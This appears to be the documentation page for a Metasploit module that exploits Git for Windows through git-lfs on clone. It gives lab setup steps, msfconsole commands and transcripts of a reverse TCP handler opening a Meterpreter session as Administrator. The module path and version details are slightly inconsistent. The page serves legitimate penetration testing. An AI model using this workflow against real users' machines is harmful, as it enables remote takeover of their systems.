adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5294c714aaafdd4e8301bfea8cf9837fbb080279
metasploit-gs/documentation/modules/exploit/windows/http/git_lfs_rce.md
T
Jack Heysel 3c43bd409d Added docs an Git User-Agent FP
2021-09-03 16:15:39 -05:00

2.8 KiB
Raw Blame History

Vulnerable Application

Git in versions <= 2.29.2 includes git-lfs extension which allows remote attackers to execute arbitrary code on the victim's Windows system upon a clone operation.

Vulnerable Installation

  1. Download a vulnerable version of Git for Windows: v2.28.0
  2. On the Select Components section of the installer, make sure Git LFS is selected (should be by default)
  3. You should now be able to run the exploit and get a session on Windows

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/git_lfs_rce
  4. Do: run
  5. Ensure the exploit sets up a repository to be cloned, ex: http://192.168.123.1:8080/fixflex.git
  6. From the victim machine, clone the repository created by the exploit.
  7. You should get a shell.

Scenarios

Git v2.28.0 on Windows 10 (2004)

msf6 exploit(windows/http/git_lfs_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.123.1:4447 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
msf6 exploit(windows/http/git_lfs_rce) > [*] Using URL: http://0.0.0.0:8080/qmuVNDrve
[*] Local IP: http://192.168.2.114:8080/qmuVNDrve
[*] Server started.
[*] Git repository to clone: http://192.168.123.1:8080/flowdesk.git
[*] Sending payload data...
[*] Sending LFS object...
[*] Sending stage (200262 bytes) to 192.168.123.130
[+] Deleted .gitattributes
[*] Meterpreter session 1 opened (192.168.123.1:4447 -> 192.168.123.130:50296) at 2021-08-09 16:45:42 -0400

msf6 exploit(windows/http/git_lfs_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-13BFU78\Administrator
meterpreter > sysinfo
Computer        : DESKTOP-13BFU78
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

Git v2.30.0 on Windows 10 20H2

msf6 exploit(windows/http/git_lfs_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
msf6 exploit(windows/http/git_lfs_rce) > [*] Using URL: http://0.0.0.0:8080/15VCXHvHTOq5O
[*] Local IP: http://192.168.2.114:8080/15VCXHvHTOq5O
[*] Server started.
[*] Git repository to clone: http://192.168.123.1:8080/fixflex.git
[-] Exception handling request: The git client needs to be running on windows with a version less than 2.29.2. The client found was running on: Windows and was version: 2.32.0
Reference in New Issue View Git Blame Copy Permalink